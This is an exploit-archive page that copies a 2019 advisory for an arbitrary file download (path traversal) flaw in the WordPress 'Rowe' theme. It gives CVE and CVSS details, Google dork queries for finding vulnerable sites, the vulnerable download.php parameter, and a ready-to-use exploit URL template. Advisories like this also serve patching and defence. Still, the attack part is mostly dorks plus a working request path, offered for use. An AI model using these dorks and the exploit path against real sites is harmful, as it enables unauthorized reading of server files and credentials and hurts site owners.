Advertisement






WordPress 4.8.9 Rowe Themes Arbitrary File Download

CVE Category Price Severity
CVE-2019-11233 CWE-200 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2019-03-18
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019030141

Below is a copy:

WordPress 4.8.9 Rowe Themes Arbitrary File Download
############################################################################################

# Exploit Title : WordPress 4.8.9 Rowe Themes Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepage : rowesa.co.za ~ knack.digital
knakdigital.com - wordpress.org
# Software Information Link : rowesa.co.za/#design-companies
# Software Affected Version : 4.8.9
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/themes/rowe/''
intext:''Website designed by KNACK DIGITAL"
# Vulnerability Type : 
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

############################################################################################

# Impact :
***********
* WordPress 4.8.9 Rowe Themes is prone to a vulnerability that lets attackers download arbitrary files because the application 

fails to sufficiently sanitize user-supplied input. An attacker can exploit this issue to download arbitrary files within the context of the 

web server process and obtain potentially sensitive informations. * An information exposure is the intentional or unintentional disclosure

of information to an actor that is not explicitly authorized to have access to that information. * The software has Relative Path Traversal 

vulnerability and it uses external input to construct a pathname that should be within a restricted directory, but it does not 

properly neutralize sequences such as ".." that can resolve to a location that is outside of that directory.

############################################################################################

Vulnerable File :
***************** 
/download.php

Vulnerable Parameter :
********************
?download_file=

# Arbitrary File Download Exploit :
*******************************
/wp-content/themes/rowe/download/download.php?download_file=[FILENAME]

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

############################################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.